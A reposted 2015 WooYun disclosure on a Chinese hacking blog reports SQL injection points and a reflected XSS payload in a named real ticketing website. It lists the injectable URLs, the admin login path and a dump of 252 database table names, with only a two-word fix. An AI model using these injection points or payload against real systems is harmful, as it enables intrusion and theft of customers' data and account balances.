记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

广西票务网注射漏洞+反射型XSS漏洞,百万数据泄露大量账号有余额可消费

2015-06-14 08:10

注入点:

http://www.gxpiao.com/Movie_page1.aspx?dyyid=1

http://www.gxpiao.com/Movie_page2.aspx?dybm=1



1.jpg



2.jpg





反射型XSS漏洞:

http://www.gxpiao.com/Movie_page1.aspx?dyyid="><script>alert(/乌云/)</script>

4.jpg





后台

http://www.gxpiao.com/manage/login.aspx

漏洞证明:

商家名称

商家类型

密码

权限

用户名





Database: gxpwdb

[252 tables]

+----------------------------+

| AppDownInfo |

| AppFeedBack |

| AppMobileCount |

| AppMobileLog |

| AppMobileLogin |

| AppMobilePoLogin |

| AppPrizeList |

| AppPrizeRecord |

| AppPrizeUser |

| CM_CG_Fjb |

| CM_CG_Fpd |

| CM_CG_FpdMx |

| CM_CG_SpcfMx |

| CM_CG_Spcfd |

| CM_CG_Sppc |

| CM_CG_SpzzMx |

| CM_CG_Spzzd |

| CM_CG_dd |

| CM_CG_ddMx |

| CM_CG_fkd |

| CM_CG_fkdMx |

| CM_CG_pdd |

| CM_CG_pddMx |

| CM_CG_thd |

| CM_CG_thdMx |

| CM_CK_CkdMx |

| CM_CK_Ckdb |

| CM_CK_Rkdb |

| CM_CK_Yj |

| CM_CK_ckd |

| CM_CK_dbd |

| CM_CK_dbdMx |

| CM_CK_rkd |

| CM_CK_rkdMx |

| CM_CW_Gdzcgl |

| CM_CW_Zcd |

| CM_CW_Zjsrd |

| CM_CW_Zzd |

| CM_CW_cwkm |

| CM_Jxc_Gysfl |

| CM_Jxc_Gysxx |

| CM_Jxc_Khfl |

| CM_Jxc_Khxx |

| CM_Jxc_Spfzb |

| CM_Jxc_Splb |

| CM_Jxc_Spxx |

| CM_Jxc_Spzzb |

| CM_OA_Bwl |

| CM_OA_Skk |

| CM_OA_Ss |

| CM_OA_Ssap |

| CM_OA_Ssfj |

| CM_OA_Txfs |

| CM_OA_Ygssb |

| CM_Qt_XS_Hyjfkj |

| CM_Qt_XS_Hykjb |

| CM_Qt_XS_Hykzl |

| CM_Qt_XS_Khda |

| CM_Qt_XS_Qtjjb |

| CM_Qt_XS_Qtth |

| CM_Qt_XS_QtthMx |

| CM_Qt_XS_Qtxs |

| CM_Qt_XS_QtxsMx |

| CM_Qt_XS_Qtxsdp |

| CM_XS_Fpd |

| CM_XS_FpdMx |

| CM_XS_Kpd |

| CM_XS_KpdMx |

| CM_XS_xsckd |

| CM_XS_xsckdMx |

| CM_XS_xsdd |

| CM_XS_xsddMx |

| CM_XS_xsskd |

| CM_XS_xsskdMx |

| CM_XS_xsthd |

| CM_XS_xsthdMx |

| CM_Xtrz |

| CM_Xtrzxm |

| CM_Yj_Gyszkye |

| CM_Yj_Khzkyj |

| CM_ZtManagement |

| D99_CMD |

| D99_Tmp |

| JC_Airport |

| Jb_Rygw |

| Jc_Bm |

| Jc_Button |

| Jc_Ck |

| Jc_Dw |

| Jc_Dy_CK_Bm |

| Jc_Dy_Menu_Button |

| Jc_Dy_Role_System |

| Jc_Dy_Users_Gw |

| Jc_Dy_Users_Role |

| Jc_GnWeb |

| Jc_Jmgxx |

| Jc_Kjqj |

| Jc_Mj |

| Jc_Role |

| Jc_Ryda |

| Jc_Rygwb |

| Jc_System |

| Jc_SystemMenu |

| Jc_Users |

| Jc_Xtcs |

| Jc_YhGzzm |

| Jc_YhZc |

| Jc_airtype |

| M_Advertis |

| M_AdvertisType |

| M_AgenPrice |

| M_ApplyDetailTable |

| M_ApplyTable |

| M_Area |

| M_Code |

| M_Cuxiao |

| M_Ddlczt |

| M_Ddlczt_bak |

| M_Ddzt |

| M_Fapiao |

| M_Fenxiao_Mb |

| M_Fenxiao_Mb_Mx |

| M_Fenxiao_log |

| M_Fenxiao_sjjg |

| M_Flight |

| M_HomePageCfg_UnWork |

| M_HomePageCfg_UnWork2 |

| M_HomePageCfg_Working |

| M_HomePageCfg_Working2 |

| M_HotelInfo |

| M_HotelInfo_JD |

| M_HotelInfo_JD_Mx |

| M_HotelInfo_Mx |

| M_Integral |

| M_Member |

| M_Member_bank |

| M_Menpiao |

| M_Menpiao_Mx |

| M_Menpiao_hd |

| M_Movie |

| M_MovieSite |

| M_MovieTicket |

| M_MovieTime |

| M_Movie_Mx |

| M_Perform |

| M_Perform_Config |

| M_Perform_cc |

| M_Perfrom_JD |

| M_Perfrom_JD_MX |

| M_Perfrom_jw |

| M_Perfrom_yccg |

| M_Psfs |

| M_QA |

| M_SecondBuy |

| M_Spdz |

| M_Splike |

| M_Substation |

| M_UserCollect |

| M_Voucher |

| M_Voucher_MX |

| M_Xianlu_hd |

| M_Zcsx |

| M_about |

| M_airline_JD |

| M_airline_JD_Mx |

| M_airline_JD_PNR |

| M_airline_Xx |

| M_codeMachine |

| M_dianzipiao |

| M_dianzipiao_Mx |

| M_hotSearch |

| M_inMoney |

| M_member_money |

| M_member_moneyCash |

| M_member_value |

| M_menpiao_JD |

| M_menpiao_JD2 |

| M_menpiao_JD_Mx |

| M_menpiao_JD_Mx2 |

| M_merchant |

| M_merchant_group |

| M_merchant_user |

| M_message |

| M_mooncake |

| M_mooncake_Dst |

| M_mooncake_FL |

| M_mooncake_JD |

| M_mooncake_JD_MX |

| M_movieTicket_JD |

| M_movieTicket_JD_Mx |

| M_project |

| M_qpdj |

| M_subject |

| M_telList |

| M_xianlu |

| M_xianlu_JD |

| M_xianlu_JD_Mx |

| M_xianlu_Mx |

| M_xianlu_back |

| M_ycyd |

| NFCUser |

| N_News |

| SMS |

| SMS_MO |

| SMS_MO_meeting |

| SMS_meeting |

| Sys_Table_No |

| UV_CM_CG_dd |

| UV_CM_CG_rkd |

| UV_CM_GnQx |

| UV_Fenxiao_MX |

| UV_GXPW_Pay |

| UV_Jc_Users |

| UV_Menu_Button |

| UV_Moon_Pay |

| UV_MovieTicket_JD |

| UV_MovieTicket_Time |

| UV_Order_recycling |

| UV_Perform_Phone |

| UV_Perfrom_JD |

| UV_Ry |

| UV_Splb_Spxx |

| UV_Spxx_Spfzb |

| UV_User_Orders |

| UV_User_menpiao |

| UV_User_xianlu |

| UV_Users_Role |

| UV_airticket |

| UV_airticket_caiwu |

| UV_menpiao_JD_Count_report |

| UV_menpiao_JD_report |

| UV_menpiao_jd_fenxiao |

| UV_message |

| UV_perform_All |

| UV_perform_cg |

| UV_perfrom_jd_MX |

| UV_user_mooncake |

| UV_user_qpdj |

| View_1 |

| View_2 |

| View_3 |

| View_ycmc |

| View_商家账号

| W_JingDian_OnlineCfg |

| W_SUBSTATION_CFG |

| W_SubStation_Pos |

| YoungTb |

| audit_table |

| buser |

| errCode |

| m_JD_number |

| vM_menpiao_hd |

+----------------------------+







1.jpg



2.jpg



3.jpg



4.jpg



5.jpg

修复方案:

过滤过滤。

知识来源: www.wooyun.org/bugs/wooyun-2015-0110881

阅读:164451 | 评论:0 | 标签:xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“广西票务网注射漏洞+反射型XSS漏洞,百万数据泄露大量账号有余额可消费”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云